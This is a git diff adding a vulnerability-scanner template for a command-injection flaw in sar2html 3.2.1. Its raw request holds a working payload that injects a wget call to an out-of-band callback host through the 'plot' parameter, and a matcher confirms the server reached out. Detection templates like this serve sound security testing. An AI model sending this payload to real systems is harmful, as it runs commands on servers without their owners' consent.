diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml
new file mode 100644
index 0000000000..39a55cbf7f
--- /dev/null
+++ b/vulnerabilities/other/sar2html-rce.yaml
@@ -0,0 +1,26 @@
+id: sar2html-rce
+
+info:
+ name: sar2html 3.2.1 - 'plot' Remote Code Execution
+ author: gy741
+ severity: critical
+ description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
+ reference: |
+ - https://www.exploit-db.com/exploits/49344
+ tags: sar2html,rce,oob
+
+requests:
+ - raw:
+ - |
+ GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: python-requests/2.18.4
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: keep-alive
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"